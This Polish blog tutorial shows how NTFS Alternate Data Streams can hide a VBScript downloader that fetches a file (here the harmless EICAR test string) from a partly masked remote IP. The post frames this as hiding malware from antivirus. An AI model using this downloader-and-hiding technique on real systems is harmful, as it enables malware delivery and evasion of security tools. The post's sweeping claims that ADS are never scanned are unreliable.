<h2 style="text-align: center;">
Wykorzystanie funkcjonalności ADS systemu plików NTFS w celu uruchomienia złośliwej aplikacji&nbsp;</h2>
<div>
<h3>
TL;DR
</h3>
<div>
Można w całkowicie bezproblemowy sposób ukryć złośliwe programy czy treść na waszym komputerze i żaden antywirus nie będzie tego świadom ;)
</div>

</div>
<div>

</div>
<h3>
Oficjalne zastosowanie ADS-ów</h3>
<div>
Jako jedno z zastosowań ADS (AlternativeData Stream) przedstawia pliki "<i>Zone Identifier</i>" będące rozszerzeniem dla pliku podstawowego, a zawierające metadane - na przykład informacje o pochodzeniu.</div>
<div>

</div>
<div>
Przeglądarka internetowa jest w stanie oznaczyć plik odpowiednią <a href="https://ravikin.blogspot.com/p/zoneidentifier.html" target="_blank">wartością </a><i>Zone-Identifier </i>dzięki temu przy próbie otwarcia go z poziomu Windowsa otrzymamy taki komunikat bezpieczeństwa:</div>
<div>

</div>
<div>

</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-lN0_x4QXSc8/Wm5X9KqZxNI/AAAAAAAAJR0/Dp-4udLVugsTfCVEgtthKa04nMWTXrUbwCK4BGAYYCw/s1600/Przechwytywanie.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="źródło: sekurak.pl" border="0" height="311" src="https://2.bp.blogspot.com/-lN0_x4QXSc8/Wm5X9KqZxNI/AAAAAAAAJR0/Dp-4udLVugsTfCVEgtthKa04nMWTXrUbwCK4BGAYYCw/s400/Przechwytywanie.PNG" title="sekurak.pl" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Informacja, że dany plik może być niebezpieczny ponieważ pochodzi z internetu.</td></tr>
</tbody></table>
<div>

</div>
<div>
Kolejnym założeniem ADS miała być kompatybilność między systemami MacOS, a Windows ponieważ swego czasu Windows nie zapisywał metadanych o utworach muzycznych i kopiowanie utworów z jednego systemu na drugi kończyło się brakiem możliwości sprawdzenia autora, tytułu utworu, zespołu...lub nawet brakiem możliwości skopiowania danych ze względu na brak pełnej kompatybilności NTFS (Windows), a HFS (Apple).</div>
<div>

</div>
<div>

</div>
<div>
Po więcej informacji o możliwościach rozszerzonych strumieni danych odsyłam do dokumentacji oraz kilku innych źródeł [<a href="https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/" target="_blank">1</a>][<a href="http://www.rootkitanalytics.com/userland/Exploring-Alternate-Data-Streams.php" target="_blank">2</a>][<a href="https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" target="_blank">3</a>].</div>
<div>

</div>
<div>

</div>
<h3>
Mniej oficjalne zastosowanie ADS :)</h3>
<div>
Jesteśmy w katalogu Workdir, który jest pusty:</div>
<div>
<a href="http://3.bp.blogspot.com/-5joqBt3dhIw/Wm5cg0Ez_8I/AAAAAAAAJSA/PRLzIfKaPv0WPto10vqipLKKNLp8Lup4QCK4BGAYYCw/s1600/Przechwytywanie.PNG" imageanchor="1"><img border="0" height="256" src="https://3.bp.blogspot.com/-5joqBt3dhIw/Wm5cg0Ez_8I/AAAAAAAAJSA/PRLzIfKaPv0WPto10vqipLKKNLp8Lup4QCK4BGAYYCw/s400/Przechwytywanie.PNG" width="400" /></a></div>
<div>

</div>
<div>
Utworzymy sobie "czysty" pliczek *.vbs oraz eicar.txt (służy do testowania antywirusów - powinien zawsze być wykrywany):</div>
<div>

</div>
<div>
<a href="http://2.bp.blogspot.com/-uhQC5woV_bE/Wm5d5u4T9sI/AAAAAAAAJSM/BMAxm9Mn-GoHtUIKbxDL7If97c9VvyxegCK4BGAYYCw/s1600/Przechwytywanie.PNG" imageanchor="1"><img border="0" height="200" src="https://2.bp.blogspot.com/-uhQC5woV_bE/Wm5d5u4T9sI/AAAAAAAAJSM/BMAxm9Mn-GoHtUIKbxDL7If97c9VvyxegCK4BGAYYCw/s640/Przechwytywanie.PNG" width="640" /></a></div>
<div>
No i jest wykrywany. :)&nbsp;</div>
<div>
A .vbs tworzy nam niewinne okienko.</div>
<div>

</div>
<div>
<a href="http://2.bp.blogspot.com/-RJfy12CFd6w/Wm5eHpujl0I/AAAAAAAAJSU/fSokBxU4dk0psWvxccPgDXWI_WV0U0lAQCK4BGAYYCw/s1600/Przechwytywanie.PNG" imageanchor="1"><img border="0" height="200" src="https://2.bp.blogspot.com/-RJfy12CFd6w/Wm5eHpujl0I/AAAAAAAAJSU/fSokBxU4dk0psWvxccPgDXWI_WV0U0lAQCK4BGAYYCw/s640/Przechwytywanie.PNG" width="640" /></a></div>
<div>

</div>
<div>
Teraz zrobimy sobie ADS'iątko. Jest to tak proste jak dodanie <b>dwukropka</b>&nbsp;do nazwy już istniejącego pliku. Tym razem namieszamy!</div>
<div>

</div>
<div>
<a href="http://4.bp.blogspot.com/-hR0Pl5dtnrY/Wm5kUsRpQiI/AAAAAAAAJSo/U7S7Z8vL1z09ui6DQQYW1L9lVioQF7b0QCK4BGAYYCw/s1600/Przechwytywanie.PNG" imageanchor="1"><img border="0" height="194" src="https://4.bp.blogspot.com/-hR0Pl5dtnrY/Wm5kUsRpQiI/AAAAAAAAJSo/U7S7Z8vL1z09ui6DQQYW1L9lVioQF7b0QCK4BGAYYCw/s640/Przechwytywanie.PNG" width="640" /></a></div>
<div>

</div>
<div>
I wpisujemy tam takie cosik:</div>
<div>
<code>
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")<br>
dim bStrm: Set bStrm = createobject("Adodb.Stream")<br>
xHttp.Open "GET", "http://xxx.xxx.xx.164/eicar/eicar.txt", False<br>
xHttp.Send<br>
with bStrm<br>
.type = 1 '//binary<br>
.open<br>
.write xHttp.responseBody<br>
.savetofile "w:\WorkDir\eicar.txt", 2 '//overwrite<br>
end with<br>
</code>
</div>
<div>



Uruchamiamy i...
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/lKHv-XRP7mA/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/lKHv-XRP7mA?feature=player_embedded" width="320"></iframe></div>

...downloader pobiera złośliwy plik. :)

Ciekawostka - ADS nie są skanowane przez anwywirusy/antymalware.

<a href="http://2.bp.blogspot.com/-aZT6cYgYJu4/Wm5m63jG78I/AAAAAAAAJS8/m_UGLOQohaEpuaSLU5tOiRTJeL643Lo1QCK4BGAYYCw/s1600/Przechwytywanie.PNG" imageanchor="1"><img border="0" height="210" src="https://2.bp.blogspot.com/-aZT6cYgYJu4/Wm5m63jG78I/AAAAAAAAJS8/m_UGLOQohaEpuaSLU5tOiRTJeL643Lo1QCK4BGAYYCw/s640/Przechwytywanie.PNG" width="640" /></a>


Myślę, że na dziś to by było wszystko. Zachęcam do własnoręcznego zgłębienia tematów i możliwości bo gdy dwa lata temu odkryłem ADS i jego właściwości to wszystko działało. Piszę ten artykuł dziś z nowymi screenshootami i skryptami...i jest tak samo.





ツ&nbsp;</div>